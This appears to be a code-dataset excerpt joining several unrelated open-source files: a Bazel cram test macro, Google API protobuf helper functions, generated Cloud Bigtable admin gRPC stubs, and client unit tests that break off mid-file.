return '<Course {}>'.format(self.title)
``` |
{
"source": "jo2y/copybara",
"score": 2
} |
#### File: copybara/integration/cram.bzl
```python
def cram_test(name, srcs, deps=[]):
for s in srcs:
testname = name + '_' + s
script = testname + '_script.sh'
gr = "_gen_" + script
# This genrule is a kludge, and at some point we should move
# to a real rule
# (http://bazel.io/docs/skylark/rules.html). What this does is
# it builds a "bash script" whose first line execs cram on the
# script. Conveniently, that first line is a comment as far as
# cram is concerned (it's not indented at all), so everything
# just works.
native.genrule(name=gr,
srcs=[s],
outs=[script],
cmd=("echo 'exec $${TEST_SRCDIR}/copybara/integration/cram " +
"--xunit-file=$$XML_OUTPUT_FILE $$0' > \"$@\" ; " +
"cat $(SRCS) >> \"$@\""),
)
native.sh_test(name=testname,
srcs=[script],
data=["//copybara/integration:cram"] + deps,
)
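# Hypothetical BUILD usage (target and file names are illustrative only):
#   load("//copybara/integration:cram.bzl", "cram_test")
#   cram_test(
#       name = "integration",
#       srcs = ["basic.t", "errors.t"],
#   )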
``` |
{
"source": "jo2y/google-cloud-python",
"score": 2
} |
#### File: google/api_core/protobuf_helpers.py
```python
import collections
import inspect
from google.protobuf.message import Message
_SENTINEL = object()
def from_any_pb(pb_type, any_pb):
"""Converts an ``Any`` protobuf to the specified message type.
Args:
pb_type (type): the type of the message that any_pb stores an instance
of.
any_pb (google.protobuf.any_pb2.Any): the object to be converted.
Returns:
pb_type: An instance of the pb_type message.
Raises:
TypeError: if the message could not be converted.
"""
msg = pb_type()
if not any_pb.Unpack(msg):
raise TypeError(
'Could not convert {} to {}'.format(
any_pb.__class__.__name__, pb_type.__name__))
return msg
def check_oneof(**kwargs):
"""Raise ValueError if more than one keyword argument is not ``None``.
Args:
kwargs (dict): The keyword arguments sent to the function.
Raises:
ValueError: If more than one entry in ``kwargs`` is not ``None``.
"""
# Sanity check: If no keyword arguments were sent, this is fine.
if not kwargs:
return
not_nones = [val for val in kwargs.values() if val is not None]
if len(not_nones) > 1:
raise ValueError('Only one of {fields} should be set.'.format(
fields=', '.join(sorted(kwargs.keys())),
))
def get_messages(module):
"""Discovers all protobuf Message classes in a given import module.
Args:
module (module): A Python module; :func:`dir` will be run against this
module to find Message subclasses.
Returns:
dict[str, Message]: A dictionary with the Message class names as
keys, and the Message subclasses themselves as values.
"""
answer = collections.OrderedDict()
for name in dir(module):
candidate = getattr(module, name)
if inspect.isclass(candidate) and issubclass(candidate, Message):
answer[name] = candidate
return answer
def _resolve_subkeys(key, separator='.'):
"""Resolve a potentially nested key.
If the key contains the ``separator`` (e.g. ``.``) then the key will be
split on the first instance of the subkey::
>>> _resolve_subkeys('a.b.c')
('a', 'b.c')
>>> _resolve_subkeys('d|e|f', separator='|')
('d', 'e|f')
If not, the subkey will be :data:`None`::
>>> _resolve_subkeys('foo')
('foo', None)
Args:
key (str): A string that may or may not contain the separator.
separator (str): The namespace separator. Defaults to `.`.
Returns:
Tuple[str, str]: The key and subkey(s).
"""
parts = key.split(separator, 1)
if len(parts) > 1:
return parts
else:
return parts[0], None
def get(msg_or_dict, key, default=_SENTINEL):
"""Retrieve a key's value from a protobuf Message or dictionary.
Args:
        msg_or_dict (Union[~google.protobuf.message.Message, Mapping]): the
object.
key (str): The key to retrieve from the object.
default (Any): If the key is not present on the object, and a default
is set, returns that default instead. A type-appropriate falsy
default is generally recommended, as protobuf messages almost
always have default values for unset values and it is not always
possible to tell the difference between a falsy value and an
unset one. If no default is set then :class:`KeyError` will be
raised if the key is not present in the object.
Returns:
Any: The return value from the underlying Message or dict.
Raises:
KeyError: If the key is not found. Note that, for unset values,
messages and dictionaries may not have consistent behavior.
TypeError: If ``msg_or_dict`` is not a Message or Mapping.
"""
# We may need to get a nested key. Resolve this.
key, subkey = _resolve_subkeys(key)
# Attempt to get the value from the two types of objects we know about.
# If we get something else, complain.
if isinstance(msg_or_dict, Message):
answer = getattr(msg_or_dict, key, default)
elif isinstance(msg_or_dict, collections.Mapping):
answer = msg_or_dict.get(key, default)
else:
raise TypeError(
'get() expected a dict or protobuf message, got {!r}.'.format(
type(msg_or_dict)))
# If the object we got back is our sentinel, raise KeyError; this is
# a "not found" case.
if answer is _SENTINEL:
raise KeyError(key)
# If a subkey exists, call this method recursively against the answer.
if subkey is not None and answer is not default:
return get(answer, subkey, default=default)
return answer
def _set_field_on_message(msg, key, value):
"""Set helper for protobuf Messages."""
# Attempt to set the value on the types of objects we know how to deal
# with.
if isinstance(value, (collections.MutableSequence, tuple)):
# Clear the existing repeated protobuf message of any elements
# currently inside it.
while getattr(msg, key):
getattr(msg, key).pop()
# Write our new elements to the repeated field.
for item in value:
if isinstance(item, collections.Mapping):
getattr(msg, key).add(**item)
else:
# protobuf's RepeatedCompositeContainer doesn't support
# append.
getattr(msg, key).extend([item])
elif isinstance(value, collections.Mapping):
# Assign the dictionary values to the protobuf message.
for item_key, item_value in value.items():
set(getattr(msg, key), item_key, item_value)
elif isinstance(value, Message):
getattr(msg, key).CopyFrom(value)
else:
setattr(msg, key, value)
def set(msg_or_dict, key, value):
"""Set a key's value on a protobuf Message or dictionary.
Args:
msg_or_dict (Union[~google.protobuf.message.Message, Mapping]): the
object.
key (str): The key to set.
value (Any): The value to set.
Raises:
TypeError: If ``msg_or_dict`` is not a Message or dictionary.
"""
# Sanity check: Is our target object valid?
if not isinstance(msg_or_dict, (collections.MutableMapping, Message)):
raise TypeError(
'set() expected a dict or protobuf message, got {!r}.'.format(
type(msg_or_dict)))
# We may be setting a nested key. Resolve this.
basekey, subkey = _resolve_subkeys(key)
# If a subkey exists, then get that object and call this method
# recursively against it using the subkey.
if subkey is not None:
if isinstance(msg_or_dict, collections.MutableMapping):
msg_or_dict.setdefault(basekey, {})
set(get(msg_or_dict, basekey), subkey, value)
return
if isinstance(msg_or_dict, collections.MutableMapping):
msg_or_dict[key] = value
else:
_set_field_on_message(msg_or_dict, key, value)
def setdefault(msg_or_dict, key, value):
"""Set the key on a protobuf Message or dictionary to a given value if the
current value is falsy.
Because protobuf Messages do not distinguish between unset values and
falsy ones particularly well (by design), this method treats any falsy
value (e.g. 0, empty list) as a target to be overwritten, on both Messages
and dictionaries.
Args:
msg_or_dict (Union[~google.protobuf.message.Message, Mapping]): the
object.
key (str): The key on the object in question.
value (Any): The value to set.
Raises:
TypeError: If ``msg_or_dict`` is not a Message or dictionary.
"""
if not get(msg_or_dict, key, default=None):
set(msg_or_dict, key, value)
```
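A short sketch of the nested-key helpers applied to a plain dictionary (the module path follows the file header above; behaviour on protobuf Messages is analogous):

```python
from google.api_core import protobuf_helpers

target = {'metadata': {'environment': 'prod'}}

# set() resolves dotted keys one level at a time.
protobuf_helpers.set(target, 'metadata.region', 'us-east1')
assert protobuf_helpers.get(target, 'metadata.region') == 'us-east1'

# setdefault() only overwrites falsy values, so the existing entry is kept.
protobuf_helpers.setdefault(target, 'metadata.environment', 'dev')
assert protobuf_helpers.get(target, 'metadata.environment') == 'prod'

# Missing keys raise KeyError unless a default is supplied.
assert protobuf_helpers.get(target, 'metadata.zone', default=None) is None
```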
#### File: bigtable_admin_v2/proto/bigtable_table_admin_pb2_grpc.py
```python
import grpc
from google.cloud.bigtable_admin_v2.proto import bigtable_table_admin_pb2 as google_dot_cloud_dot_bigtable_dot_admin__v2_dot_proto_dot_bigtable__table__admin__pb2
from google.cloud.bigtable_admin_v2.proto import table_pb2 as google_dot_cloud_dot_bigtable_dot_admin__v2_dot_proto_dot_table__pb2
from google.longrunning import operations_pb2 as google_dot_longrunning_dot_operations__pb2
from google.protobuf import empty_pb2 as google_dot_protobuf_dot_empty__pb2
class BigtableTableAdminStub(object):
"""Service for creating, configuring, and deleting Cloud Bigtable tables.
Provides access to the table schemas only, not the data stored within
the tables.
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.CreateTable = channel.unary_unary(
'/google.bigtable.admin.v2.BigtableTableAdmin/CreateTable',
request_serializer=google_dot_cloud_dot_bigtable_dot_admin__v2_dot_proto_dot_bigtable__table__admin__pb2.CreateTableRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_bigtable_dot_admin__v2_dot_proto_dot_table__pb2.Table.FromString,
)
self.CreateTableFromSnapshot = channel.unary_unary(
'/google.bigtable.admin.v2.BigtableTableAdmin/CreateTableFromSnapshot',
request_serializer=google_dot_cloud_dot_bigtable_dot_admin__v2_dot_proto_dot_bigtable__table__admin__pb2.CreateTableFromSnapshotRequest.SerializeToString,
response_deserializer=google_dot_longrunning_dot_operations__pb2.Operation.FromString,
)
self.ListTables = channel.unary_unary(
'/google.bigtable.admin.v2.BigtableTableAdmin/ListTables',
request_serializer=google_dot_cloud_dot_bigtable_dot_admin__v2_dot_proto_dot_bigtable__table__admin__pb2.ListTablesRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_bigtable_dot_admin__v2_dot_proto_dot_bigtable__table__admin__pb2.ListTablesResponse.FromString,
)
self.GetTable = channel.unary_unary(
'/google.bigtable.admin.v2.BigtableTableAdmin/GetTable',
request_serializer=google_dot_cloud_dot_bigtable_dot_admin__v2_dot_proto_dot_bigtable__table__admin__pb2.GetTableRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_bigtable_dot_admin__v2_dot_proto_dot_table__pb2.Table.FromString,
)
self.DeleteTable = channel.unary_unary(
'/google.bigtable.admin.v2.BigtableTableAdmin/DeleteTable',
request_serializer=google_dot_cloud_dot_bigtable_dot_admin__v2_dot_proto_dot_bigtable__table__admin__pb2.DeleteTableRequest.SerializeToString,
response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
)
self.ModifyColumnFamilies = channel.unary_unary(
'/google.bigtable.admin.v2.BigtableTableAdmin/ModifyColumnFamilies',
request_serializer=google_dot_cloud_dot_bigtable_dot_admin__v2_dot_proto_dot_bigtable__table__admin__pb2.ModifyColumnFamiliesRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_bigtable_dot_admin__v2_dot_proto_dot_table__pb2.Table.FromString,
)
self.DropRowRange = channel.unary_unary(
'/google.bigtable.admin.v2.BigtableTableAdmin/DropRowRange',
request_serializer=google_dot_cloud_dot_bigtable_dot_admin__v2_dot_proto_dot_bigtable__table__admin__pb2.DropRowRangeRequest.SerializeToString,
response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
)
self.GenerateConsistencyToken = channel.unary_unary(
'/google.bigtable.admin.v2.BigtableTableAdmin/GenerateConsistencyToken',
request_serializer=google_dot_cloud_dot_bigtable_dot_admin__v2_dot_proto_dot_bigtable__table__admin__pb2.GenerateConsistencyTokenRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_bigtable_dot_admin__v2_dot_proto_dot_bigtable__table__admin__pb2.GenerateConsistencyTokenResponse.FromString,
)
self.CheckConsistency = channel.unary_unary(
'/google.bigtable.admin.v2.BigtableTableAdmin/CheckConsistency',
request_serializer=google_dot_cloud_dot_bigtable_dot_admin__v2_dot_proto_dot_bigtable__table__admin__pb2.CheckConsistencyRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_bigtable_dot_admin__v2_dot_proto_dot_bigtable__table__admin__pb2.CheckConsistencyResponse.FromString,
)
self.SnapshotTable = channel.unary_unary(
'/google.bigtable.admin.v2.BigtableTableAdmin/SnapshotTable',
request_serializer=google_dot_cloud_dot_bigtable_dot_admin__v2_dot_proto_dot_bigtable__table__admin__pb2.SnapshotTableRequest.SerializeToString,
response_deserializer=google_dot_longrunning_dot_operations__pb2.Operation.FromString,
)
self.GetSnapshot = channel.unary_unary(
'/google.bigtable.admin.v2.BigtableTableAdmin/GetSnapshot',
request_serializer=google_dot_cloud_dot_bigtable_dot_admin__v2_dot_proto_dot_bigtable__table__admin__pb2.GetSnapshotRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_bigtable_dot_admin__v2_dot_proto_dot_table__pb2.Snapshot.FromString,
)
self.ListSnapshots = channel.unary_unary(
'/google.bigtable.admin.v2.BigtableTableAdmin/ListSnapshots',
request_serializer=google_dot_cloud_dot_bigtable_dot_admin__v2_dot_proto_dot_bigtable__table__admin__pb2.ListSnapshotsRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_bigtable_dot_admin__v2_dot_proto_dot_bigtable__table__admin__pb2.ListSnapshotsResponse.FromString,
)
self.DeleteSnapshot = channel.unary_unary(
'/google.bigtable.admin.v2.BigtableTableAdmin/DeleteSnapshot',
request_serializer=google_dot_cloud_dot_bigtable_dot_admin__v2_dot_proto_dot_bigtable__table__admin__pb2.DeleteSnapshotRequest.SerializeToString,
response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
)
class BigtableTableAdminServicer(object):
"""Service for creating, configuring, and deleting Cloud Bigtable tables.
Provides access to the table schemas only, not the data stored within
the tables.
"""
def CreateTable(self, request, context):
"""Creates a new table in the specified instance.
The table can be created with a full set of initial column families,
specified in the request.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def CreateTableFromSnapshot(self, request, context):
"""This is a private alpha release of Cloud Bigtable snapshots. This feature
is not currently available to most Cloud Bigtable customers. This feature
might be changed in backward-incompatible ways and is not recommended for
production use. It is not subject to any SLA or deprecation policy.
Creates a new table from the specified snapshot. The target table must
not exist. The snapshot and the table must be in the same instance.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ListTables(self, request, context):
"""Lists all tables served from a specified instance.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetTable(self, request, context):
"""Gets metadata information about the specified table.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def DeleteTable(self, request, context):
"""Permanently deletes a specified table and all of its data.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ModifyColumnFamilies(self, request, context):
"""Performs a series of column family modifications on the specified table.
Either all or none of the modifications will occur before this method
returns, but data requests received prior to that point may see a table
where only some modifications have taken effect.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def DropRowRange(self, request, context):
"""Permanently drop/delete a row range from a specified table. The request can
specify whether to delete all rows in a table, or only those that match a
particular prefix.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GenerateConsistencyToken(self, request, context):
"""This is a private alpha release of Cloud Bigtable replication. This feature
is not currently available to most Cloud Bigtable customers. This feature
might be changed in backward-incompatible ways and is not recommended for
production use. It is not subject to any SLA or deprecation policy.
Generates a consistency token for a Table, which can be used in
CheckConsistency to check whether mutations to the table that finished
before this call started have been replicated. The tokens will be available
for 90 days.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def CheckConsistency(self, request, context):
"""This is a private alpha release of Cloud Bigtable replication. This feature
is not currently available to most Cloud Bigtable customers. This feature
might be changed in backward-incompatible ways and is not recommended for
production use. It is not subject to any SLA or deprecation policy.
Checks replication consistency based on a consistency token, that is, if
replication has caught up based on the conditions specified in the token
and the check request.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def SnapshotTable(self, request, context):
"""This is a private alpha release of Cloud Bigtable snapshots. This feature
is not currently available to most Cloud Bigtable customers. This feature
might be changed in backward-incompatible ways and is not recommended for
production use. It is not subject to any SLA or deprecation policy.
Creates a new snapshot in the specified cluster from the specified
source table. The cluster and the table must be in the same instance.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetSnapshot(self, request, context):
"""This is a private alpha release of Cloud Bigtable snapshots. This feature
is not currently available to most Cloud Bigtable customers. This feature
might be changed in backward-incompatible ways and is not recommended for
production use. It is not subject to any SLA or deprecation policy.
Gets metadata information about the specified snapshot.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ListSnapshots(self, request, context):
"""This is a private alpha release of Cloud Bigtable snapshots. This feature
is not currently available to most Cloud Bigtable customers. This feature
might be changed in backward-incompatible ways and is not recommended for
production use. It is not subject to any SLA or deprecation policy.
Lists all snapshots associated with the specified cluster.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def DeleteSnapshot(self, request, context):
"""This is a private alpha release of Cloud Bigtable snapshots. This feature
is not currently available to most Cloud Bigtable customers. This feature
might be changed in backward-incompatible ways and is not recommended for
production use. It is not subject to any SLA or deprecation policy.
Permanently deletes the specified snapshot.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_BigtableTableAdminServicer_to_server(servicer, server):
rpc_method_handlers = {
'CreateTable': grpc.unary_unary_rpc_method_handler(
servicer.CreateTable,
request_deserializer=google_dot_cloud_dot_bigtable_dot_admin__v2_dot_proto_dot_bigtable__table__admin__pb2.CreateTableRequest.FromString,
response_serializer=google_dot_cloud_dot_bigtable_dot_admin__v2_dot_proto_dot_table__pb2.Table.SerializeToString,
),
'CreateTableFromSnapshot': grpc.unary_unary_rpc_method_handler(
servicer.CreateTableFromSnapshot,
request_deserializer=google_dot_cloud_dot_bigtable_dot_admin__v2_dot_proto_dot_bigtable__table__admin__pb2.CreateTableFromSnapshotRequest.FromString,
response_serializer=google_dot_longrunning_dot_operations__pb2.Operation.SerializeToString,
),
'ListTables': grpc.unary_unary_rpc_method_handler(
servicer.ListTables,
request_deserializer=google_dot_cloud_dot_bigtable_dot_admin__v2_dot_proto_dot_bigtable__table__admin__pb2.ListTablesRequest.FromString,
response_serializer=google_dot_cloud_dot_bigtable_dot_admin__v2_dot_proto_dot_bigtable__table__admin__pb2.ListTablesResponse.SerializeToString,
),
'GetTable': grpc.unary_unary_rpc_method_handler(
servicer.GetTable,
request_deserializer=google_dot_cloud_dot_bigtable_dot_admin__v2_dot_proto_dot_bigtable__table__admin__pb2.GetTableRequest.FromString,
response_serializer=google_dot_cloud_dot_bigtable_dot_admin__v2_dot_proto_dot_table__pb2.Table.SerializeToString,
),
'DeleteTable': grpc.unary_unary_rpc_method_handler(
servicer.DeleteTable,
request_deserializer=google_dot_cloud_dot_bigtable_dot_admin__v2_dot_proto_dot_bigtable__table__admin__pb2.DeleteTableRequest.FromString,
response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
),
'ModifyColumnFamilies': grpc.unary_unary_rpc_method_handler(
servicer.ModifyColumnFamilies,
request_deserializer=google_dot_cloud_dot_bigtable_dot_admin__v2_dot_proto_dot_bigtable__table__admin__pb2.ModifyColumnFamiliesRequest.FromString,
response_serializer=google_dot_cloud_dot_bigtable_dot_admin__v2_dot_proto_dot_table__pb2.Table.SerializeToString,
),
'DropRowRange': grpc.unary_unary_rpc_method_handler(
servicer.DropRowRange,
request_deserializer=google_dot_cloud_dot_bigtable_dot_admin__v2_dot_proto_dot_bigtable__table__admin__pb2.DropRowRangeRequest.FromString,
response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
),
'GenerateConsistencyToken': grpc.unary_unary_rpc_method_handler(
servicer.GenerateConsistencyToken,
request_deserializer=google_dot_cloud_dot_bigtable_dot_admin__v2_dot_proto_dot_bigtable__table__admin__pb2.GenerateConsistencyTokenRequest.FromString,
response_serializer=google_dot_cloud_dot_bigtable_dot_admin__v2_dot_proto_dot_bigtable__table__admin__pb2.GenerateConsistencyTokenResponse.SerializeToString,
),
'CheckConsistency': grpc.unary_unary_rpc_method_handler(
servicer.CheckConsistency,
request_deserializer=google_dot_cloud_dot_bigtable_dot_admin__v2_dot_proto_dot_bigtable__table__admin__pb2.CheckConsistencyRequest.FromString,
response_serializer=google_dot_cloud_dot_bigtable_dot_admin__v2_dot_proto_dot_bigtable__table__admin__pb2.CheckConsistencyResponse.SerializeToString,
),
'SnapshotTable': grpc.unary_unary_rpc_method_handler(
servicer.SnapshotTable,
request_deserializer=google_dot_cloud_dot_bigtable_dot_admin__v2_dot_proto_dot_bigtable__table__admin__pb2.SnapshotTableRequest.FromString,
response_serializer=google_dot_longrunning_dot_operations__pb2.Operation.SerializeToString,
),
'GetSnapshot': grpc.unary_unary_rpc_method_handler(
servicer.GetSnapshot,
request_deserializer=google_dot_cloud_dot_bigtable_dot_admin__v2_dot_proto_dot_bigtable__table__admin__pb2.GetSnapshotRequest.FromString,
response_serializer=google_dot_cloud_dot_bigtable_dot_admin__v2_dot_proto_dot_table__pb2.Snapshot.SerializeToString,
),
'ListSnapshots': grpc.unary_unary_rpc_method_handler(
servicer.ListSnapshots,
request_deserializer=google_dot_cloud_dot_bigtable_dot_admin__v2_dot_proto_dot_bigtable__table__admin__pb2.ListSnapshotsRequest.FromString,
response_serializer=google_dot_cloud_dot_bigtable_dot_admin__v2_dot_proto_dot_bigtable__table__admin__pb2.ListSnapshotsResponse.SerializeToString,
),
'DeleteSnapshot': grpc.unary_unary_rpc_method_handler(
servicer.DeleteSnapshot,
request_deserializer=google_dot_cloud_dot_bigtable_dot_admin__v2_dot_proto_dot_bigtable__table__admin__pb2.DeleteSnapshotRequest.FromString,
response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'google.bigtable.admin.v2.BigtableTableAdmin', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
```
#### File: gapic/v2/test_bigtable_table_admin_client_v2.py
```python
import pytest
from google.rpc import status_pb2
from google.cloud import bigtable_admin_v2
from google.cloud.bigtable_admin_v2.proto import bigtable_table_admin_pb2
from google.cloud.bigtable_admin_v2.proto import table_pb2
from google.longrunning import operations_pb2
from google.protobuf import empty_pb2
class MultiCallableStub(object):
"""Stub for the grpc.UnaryUnaryMultiCallable interface."""
def __init__(self, method, channel_stub):
self.method = method
self.channel_stub = channel_stub
def __call__(self, request, timeout=None, metadata=None, credentials=None):
self.channel_stub.requests.append((self.method, request))
response = None
if self.channel_stub.responses:
response = self.channel_stub.responses.pop()
if isinstance(response, Exception):
raise response
if response:
return response
class ChannelStub(object):
"""Stub for the grpc.Channel interface."""
def __init__(self, responses=[]):
self.responses = responses
self.requests = []
def unary_unary(self,
method,
request_serializer=None,
response_deserializer=None):
return MultiCallableStub(method, self)
class CustomException(Exception):
pass
class TestBigtableTableAdminClient(object):
def test_create_table(self):
# Setup Expected Response
name = 'name3373707'
expected_response = {'name': name}
expected_response = table_pb2.Table(**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
client = bigtable_admin_v2.BigtableTableAdminClient(channel=channel)
# Setup Request
parent = client.instance_path('[PROJECT]', '[INSTANCE]')
table_id = 'tableId-895419604'
table = {}
response = client.create_table(parent, table_id, table)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = bigtable_table_admin_pb2.CreateTableRequest(
parent=parent, table_id=table_id, table=table)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_create_table_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
client = bigtable_admin_v2.BigtableTableAdminClient(channel=channel)
# Setup request
parent = client.instance_path('[PROJECT]', '[INSTANCE]')
table_id = 'tableId-895419604'
table = {}
with pytest.raises(CustomException):
client.create_table(parent, table_id, table)
def test_create_table_from_snapshot(self):
# Setup Expected Response
name = 'name3373707'
expected_response = {'name': name}
expected_response = table_pb2.Table(**expected_response)
operation = operations_pb2.Operation(
name='operations/test_create_table_from_snapshot', done=True)
operation.response.Pack(expected_response)
# Mock the API response
channel = ChannelStub(responses=[operation])
client = bigtable_admin_v2.BigtableTableAdminClient(channel=channel)
# Setup Request
parent = client.instance_path('[PROJECT]', '[INSTANCE]')
table_id = 'tableId-895419604'
source_snapshot = 'sourceSnapshot-947679896'
response = client.create_table_from_snapshot(parent, table_id,
source_snapshot)
result = response.result()
assert expected_response == result
assert len(channel.requests) == 1
expected_request = bigtable_table_admin_pb2.CreateTableFromSnapshotRequest(
parent=parent, table_id=table_id, source_snapshot=source_snapshot)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_create_table_from_snapshot_exception(self):
# Setup Response
error = status_pb2.Status()
operation = operations_pb2.Operation(
name='operations/test_create_table_from_snapshot_exception',
done=True)
operation.error.CopyFrom(error)
# Mock the API response
channel = ChannelStub(responses=[operation])
client = bigtable_admin_v2.BigtableTableAdminClient(channel=channel)
# Setup Request
parent = client.instance_path('[PROJECT]', '[INSTANCE]')
table_id = 'tableId-895419604'
source_snapshot = 'sourceSnapshot-947679896'
response = client.create_table_from_snapshot(parent, table_id,
source_snapshot)
exception = response.exception()
assert exception.errors[0] == error
def test_list_tables(self):
# Setup Expected Response
next_page_token = ''
tables_element = {}
tables = [tables_element]
expected_response = {
'next_page_token': next_page_token,
'tables': tables
}
expected_response = bigtable_table_admin_pb2.ListTablesResponse(
**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
client = bigtable_admin_v2.BigtableTableAdminClient(channel=channel)
# Setup Request
parent = client.instance_path('[PROJECT]', '[INSTANCE]')
paged_list_response = client.list_tables(parent)
resources = list(paged_list_response)
assert len(resources) == 1
assert expected_response.tables[0] == resources[0]
assert len(channel.requests) == 1
expected_request = bigtable_table_admin_pb2.ListTablesRequest(
parent=parent)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_list_tables_exception(self):
channel = ChannelStub(responses=[CustomException()])
client = bigtable_admin_v2.BigtableTableAdminClient(channel=channel)
# Setup request
parent = client.instance_path('[PROJECT]', '[INSTANCE]')
paged_list_response = client.list_tables(parent)
with pytest.raises(CustomException):
list(paged_list_response)
def test_get_table(self):
# Setup Expected Response
name_2 = 'name2-1052831874'
expected_response = {'name': name_2}
expected_response = table_pb2.Table(**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
client = bigtable_admin_v2.BigtableTableAdminClient(channel=channel)
# Setup Request
name = client.table_path('[PROJECT]', '[INSTANCE]', '[TABLE]')
response = client.get_table(name)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = bigtable_table_admin_pb2.GetTableRequest(name=name)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_get_table_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
client = bigtable_admin_v2.BigtableTableAdminClient(channel=channel)
# Setup request
name = client.table_path('[PROJECT]', '[INSTANCE]', '[TABLE]')
with pytest.raises(CustomException):
client.get_table(name)
def test_delete_table(self):
channel = ChannelStub()
client = bigtable_admin_v2.BigtableTableAdminClient(channel=channel)
# Setup Request
name = client.table_path('[PROJECT]', '[INSTANCE]', '[TABLE]')
client.delete_table(name)
assert len(channel.requests) == 1
expected_request = bigtable_table_admin_pb2.DeleteTableRequest(
name=name)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_delete_table_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
client = bigtable_admin_v2.BigtableTableAdminClient(channel=channel)
# Setup request
name = client.table_path('[PROJECT]', '[INSTANCE]', '[TABLE]')
with pytest.raises(CustomException):
client.delete_table(name)
def test_modify_column_families(self):
# Setup Expected Response
name_2 = 'name2-1052831874'
expected_response = {'name': name_2}
expected_response = table_pb2.Table(**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
client = bigtable_admin_v2.BigtableTableAdminClient(channel=channel)
# Setup Request
name = client.table_path('[PROJECT]', '[INSTANCE]', '[TABLE]')
modifications = []
response = client.modify_column_families(name, modifications)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = bigtable_table_admin_pb2.ModifyColumnFamiliesRequest(
name=name, modifications=modifications)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_modify_column_families_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
client = bigtable_admin_v2.BigtableTableAdminClient(channel=channel)
# Setup request
name = client.table_path('[PROJECT]', '[INSTANCE]', '[TABLE]')
modifications = []
with pytest.raises(CustomException):
client.modify_column_families(name, modifications)
def test_drop_row_range(self):
channel = ChannelStub()
client = bigtable_admin_v2.BigtableTableAdminClient(channel=channel)
# Setup Request
name = client.table_path('[PROJECT]', '[INSTANCE]', '[TABLE]')
client.drop_row_range(name)
assert len(channel.requests) == 1
expected_request = bigtable_table_admin_pb2.DropRowRangeRequest(
name=name)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_drop_row_range_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
client = bigtable_admin_v2.BigtableTableAdminClient(channel=channel)
# Setup request
name = client.table_path('[PROJECT]', '[INSTANCE]', '[TABLE]')
with pytest.raises(CustomException):
client.drop_row_range(name)
def test_generate_consistency_token(self):
# Setup Expected Response
consistency_token = 'consistencyToken-<PASSWORD>'
expected_response = {'consistency_token': consistency_token}
expected_response = bigtable_table_admin_pb2.GenerateConsistencyTokenResponse(
**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
client = bigtable_admin_v2.BigtableTableAdminClient(channel=channel)
# Setup Request
name = client.table_path('[PROJECT]', '[INSTANCE]', '[TABLE]')
response = client.generate_consistency_token(name)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = bigtable_table_admin_pb2.GenerateConsistencyTokenRequest(
name=name)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_generate_consistency_token_exception(self):
# Mock the API response
